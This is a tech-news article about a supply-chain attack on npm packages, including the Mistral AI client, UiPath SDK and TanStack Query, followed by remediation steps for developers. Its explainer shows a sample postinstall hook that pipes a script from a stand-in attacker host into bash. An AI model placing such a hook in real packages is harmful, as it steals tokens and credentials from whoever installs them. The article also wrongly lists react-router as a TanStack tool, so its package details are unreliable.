‹ Back to Home

Supply‑chain hack hits npm: Mistral, UiPath and TanStack packages compromised

A new supply‑chain attack called Mini Shai‑Hulud has polluted dozens of npm packages, including popular Mistral AI, UiPath and TanStack libraries. Indian developers need to act fast.

Keerthika 5 min read 252
Follow on Google
Updated 1 month ago
Security Supply‑chain hack hits npm: Mistral, UiPath and TanStack packages compromised 5 min left Follow on Google
Supply‑chain hack hits npm: Mistral, UiPath and TanStack packages compromised

TamilTech AI summary

A coordinated npm supply-chain attack called Mini Shai-Hulud slipped malicious code into more than 30 packages last week, including the mistral-ai client, UiPath SDK helpers, react-router, and @tanstack/query. The bad versions used a postinstall hook that curled a remote script, dropped a binary into node_modules, and could steal npm tokens, git credentials, and .env files the moment you ran npm install. That matters because many teams lean on these libraries for AI chatbots, RPA work, and React apps, so a single compromised install could leak cloud keys, open backdoors, or even plant ransomware in CI and Docker images. If you installed any of the listed versions between 22 and 28 May 2024, audit your lockfiles, wipe node_modules and the lockfile, reinstall clean releases, and rotate every secret that might have been exposed. Going forward, treat every npm install as a trust boundary: turn on integrity checks, prefer npm ci, consider a private registry, and keep an SBOM so you catch the next supply-chain hit before it lands in production.

  • Mini Shai‑Hulud injected malicious postinstall scripts into 30+ npm packages.
  • Affected libs include Mistral AI client, UiPath SDK, React‑Router and TanStack Query.
  • Indian developers should audit lockfiles, rotate secrets and adopt SBOMs immediately.

AI-assisted summary, checked by the TamilTech editorial team.

0:00
0:00
🔒 Listen is for subscribers. Subscribe

What happened?

In the last week a coordinated supply‑chain attack – dubbed Mini Shai‑Hulud – managed to inject malicious code into more than 30 npm packages. The victims include the mistral‑ai client, several uipath‑sdk helpers, and core TanStack tools like react‑router and @tanstack/query. The attackers published a new version of each package that pulls a hidden script from a remote server and runs it on install.

How the attack works

The malicious version follows the typical postinstall hook pattern. When you run npm install, the hook executes a curl command that fetches a binary, drops it in node_modules/.bin, and then adds the binary to your PATH. From that point on, any CLI you run could be hijacked.

npm install [email protected]
# postinstall script inside package.json
"scripts": { "postinstall": "curl -s https://badguy.com/x | bash" }

Because the malicious code is executed during install, it bypasses most runtime security tools. The payload typically exfiltrates npm_token, git_credentials and even steals .env files from the project.

Which packages are affected?

  • mistral-ai – the official client for the Mistral LLM API.
  • uipath‑sdk, uipath‑cli – helpers used by RPA developers.
  • react‑router (v6.15.0) – core routing library for React.
  • @tanstack/query (v5.0.2) – data‑fetching library for React, Vue and Svelte.
  • Several minor utilities in the @tanstack monorepo.

All of these packages were published between 22 May and 28 May 2024. The malicious versions were quickly removed, but the damage is already done for anyone who installed them during that window.

Why Indian developers should care

Many Indian startups use Mistral for AI‑powered chatbots, UiPath for automating back‑office tasks, and TanStack for building SPAs. If a compromised package made it into your CI pipeline, the attacker could have:

  1. Stolen API keys for services like Google Cloud, AWS, Azure.
  2. Injected ransomware into your Docker images.
  3. Created a back‑door that later fetches more malware.

Given the scale of Indian fintech, health‑tech and e‑commerce apps, a breach can lead to loss of user data, financial fraud and even regulatory penalties under the IT Act.

Immediate steps for dev teams

  1. Audit your lockfiles. Run npm audit and look for versions 2.4.1 of mistral-ai, 6.15.0 of react-router, etc.
  2. Re‑install clean versions. Delete node_modules and package‑lock.json, then run npm install after fixing the version ranges.
  3. Rotate secrets. Any token that was stored in the repo or CI environment before the attack should be regenerated.
  4. Enable npm’s audit and integrity checks. Add npm ci --prefer‑offline in CI pipelines to avoid pulling unverified packages.
  5. Use a private registry or proxy. Tools like Verdaccio or GitHub Packages let you lock down which versions are allowed.

Long‑term safeguards

Supply‑chain attacks are becoming the new normal. Here’s what TamilTech‑ஓட கருத்து says you should bake into your process:

  • SBOM (Software Bill of Materials) – generate a list of every dependency and scan it with tools like Syft or Dependency‑Track.
  • Code‑signing for npm packages. Only accept packages that are signed with a trusted key.
  • Zero‑trust CI. Run builds in isolated containers and never expose your production secrets to the build environment.
  • Community monitoring. Subscribe to npm security alerts and watch the #npm‑security Slack channel.

What to expect next

The npm security team has already flagged the malicious versions and is working with the maintainers to add extra verification. In the next few days we expect a “verified publisher” badge for the affected libraries. Meanwhile, keep an eye on the official GitHub repos for a “security‑advisory” PR that bumps the version numbers.

For Indian devs, the key takeaway is simple: don’t treat npm install as a harmless step. Treat every package like a potential entry point, especially when you are dealing with AI APIs or RPA tools that have high‑privilege tokens.

Stay safe, keep your lockfiles clean, and remember – a little extra vigilance now saves you hours of firefighting later.

Get tomorrow’s tech news on WhatsApp

One short update a day, free. Follow the TamilTech channel.

What do you think?

people reacted

Keerthika

TamilTech editorial team · 3,344 articles

Keerthika is an editor at TamilTech, the Tamil and English technology publication founded by Praveen Kumar S. She covers AI, smartphones, gadgets, EVs, startups and cybersecurity i...

More from Keerthika

Ask TamilTech on WhatsApp

Tech doubt? Ask in Tamil or English — our WhatsApp assistant answers from TamilTech articles in seconds.

Related stories

Comments (0)

| Supports **bold**, *italic*, `code`

Be the first to comment!

Next story PixelLeak: How AI Coding Agents Put 13,000 Internal Screenshots on Public GitHub
Tamiltech

Tamiltech

Install app for faster access

Earn XP 🏆
WhatsApp
Notifications